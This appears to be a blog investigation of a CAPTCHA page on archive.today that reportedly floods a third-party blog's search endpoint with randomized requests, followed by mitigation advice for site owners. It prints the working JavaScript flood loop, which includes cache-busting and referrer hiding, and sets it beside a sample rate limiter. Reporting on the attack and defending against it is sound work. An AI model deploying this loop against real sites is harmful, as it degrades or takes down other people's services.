archive.today CAPTCHA Script Sends DDoS-Level Traffic — What Site Owners Must Know

Investigation

February 2026 · analysis · labels: archive.today, DDoS

TL;DR: Reported analysis shows archive.today’s CAPTCHA page running a tiny JavaScript loop that repeatedly requests a blog’s search endpoint roughly every 300 milliseconds — about three automated hits per second — causing sustained, DDoS-style traffic.

What was observed

When the archive.today CAPTCHA page is opened, it reportedly executes a short client-side script that issues repeated `fetch()` requests to a target site for as long as the page stays open. Each request carries a randomized query string to defeat caching, so the target must do fresh search work for every hit.

```javascript
setInterval(function () {
  // Random query string: each request is unique, so caches never absorb the load.
  fetch(
    "https://gyrovague.com/?s=" +
      Math.random().toString(36).substring(2, 3 + Math.random() * 8),
    { referrerPolicy: "no-referrer", mode: "no-cors" }
  );
}, 300); // fires roughly every 300 ms, about 3 requests per second
```

In plain language: while the page is open, it sends roughly 3 automated searches per second to the same site. For small blogs or resource-limited hosts, that steady stream degrades performance and can cause outages, which meets practical definitions of a DDoS event.
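The arithmetic behind that estimate is a quick sketch using the 300 ms interval from the script above (the variable names here are illustrative only):

```javascript
// Load generated by one open CAPTCHA tab, assuming the 300 ms interval
// observed in the reported script.
const intervalMs = 300;
const requestsPerSecond = 1000 / intervalMs; // ≈ 3.33

// Cumulative requests hitting the target while the tab stays open:
const perMinute = requestsPerSecond * 60; // ≈ 200
const perHour = perMinute * 60;           // ≈ 12,000

console.log(requestsPerSecond.toFixed(2), Math.round(perMinute), Math.round(perHour));
```

Multiply that by every visitor who leaves the CAPTCHA tab open, and the aggregate easily resembles a distributed flood.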

Why this matters

Turning visitors’ browsers into traffic generators weaponizes ordinary traffic. Even if the script was introduced with benign intent (for bot-mitigation or analytics), the effect on third-party sites can be harmful. This raises questions about archive tool design, operator responsibility, and safe fallback behavior.

Quick note: The findings and code sample were reported and documented in the original investigation; see the sources below for screenshots, timelines, and community discussion.

Immediate mitigation steps for site owners

  • Rate-limit endpoints: Add server-side throttling (return 429) on search or other high-cost routes.
  • CDN/WAF rules: Use your CDN or WAF to block high-frequency patterns or serve lightweight cached responses to suspicious queries.
  • Ignore obvious noise: Treat extremely short/random search queries as low-priority and return cheap cached payloads.
  • Log & collect evidence: Capture sample request timestamps, headers, and user-agents for abuse reports.
  • Block domains if needed: Use DNS/adblock lists selectively if a third-party domain is causing persistent harm to your site.
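The first mitigation, server-side throttling, can be sketched as a minimal fixed-window rate limiter keyed by client IP. All names here (`allowRequest`, `WINDOW_MS`, `MAX_REQUESTS`) are illustrative, not from any specific framework; wire the check into whatever handles your search route and respond with HTTP 429 when it returns false:

```javascript
// Minimal fixed-window rate limiter sketch (illustrative, framework-agnostic).
const WINDOW_MS = 10_000;  // 10-second window
const MAX_REQUESTS = 5;    // generous for humans, restrictive for a 3/sec loop

const hits = new Map();    // ip -> { windowStart, count }

function allowRequest(ip, now = Date.now()) {
  const entry = hits.get(ip);
  if (!entry || now - entry.windowStart >= WINDOW_MS) {
    // New client, or the previous window has expired: start a fresh window.
    hits.set(ip, { windowStart: now, count: 1 });
    return true;
  }
  entry.count += 1;
  return entry.count <= MAX_REQUESTS;
}

// In an HTTP handler (sketch):
//   if (!allowRequest(req.ip)) { res.statusCode = 429; return res.end(); }
```

A loop firing every 300 ms exhausts this budget within two seconds, while a human issuing occasional searches never notices the limit. A production setup would also evict stale `hits` entries and might prefer a sliding window, but the shape of the check is the same.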

Community reaction & reporting

The incident prompted active discussion on community channels where users examined screenshots, code, and email timelines — debating whether the behavior was intentional and how archives should be held accountable when their tools harm other sites.
